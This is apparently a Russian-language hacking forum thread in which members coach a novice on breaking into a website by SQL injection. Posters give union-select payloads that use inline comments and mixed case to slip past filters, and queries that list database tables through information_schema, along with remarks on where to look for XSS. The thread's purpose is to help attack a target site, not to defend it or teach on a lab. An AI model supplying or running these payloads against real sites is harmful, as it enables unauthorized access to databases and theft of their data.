mr.celt

а вот как насчет того, что все попытки SQL инекции - открывает стартовая страница?
Насчет XSS - негде проверять, т.к. поиск по сайту нету. единственно где нашел ввести данные - это где пишется письмо (оратный адрес)

пробуй:

id=-1/**/unION/**/selECT/**/1,2,3--+

И вообще, читай больше инфи

---

ксс может быть не только в поиске..

если пробовать вот так:
http://www.site.ru/?id=-1/**/unION/**/selECT/**/1,2,3--+
то открывает гравная страница (ничем не отличается от www.site.ru)
А если просто вот так:
http://www.site.ru/id=-1/**/unION/**/selECT/**/1,2,3--+
то кидает в сайт хостера, с надпесем:
Может тут какой то "супер" технология работает? или какой-то неприступный СУБД ?

блин, я даже не знаю как тебе объяснить

1) очень быстро перешел на такий сайты
2) читай мануалы!

Тебе в этой теме уже рассказали что читать и делать!

Делая запрос:
Выдаёт
что не так?

Не?

DeluxeS

ну скажем так штатный экстрасенс работает сейчас в разделе инклюдов... можно линк в студию?

и зачем тебе использовать здесь concat?
union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3C42523 E,table_name),11+from+information_schema.tables+li mit+1,1

или же делaй запрос без concat-a ... или же попробуй так
union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,tabl e_name,table_schema),11+from+information_schema.ta bles+li mit+1,1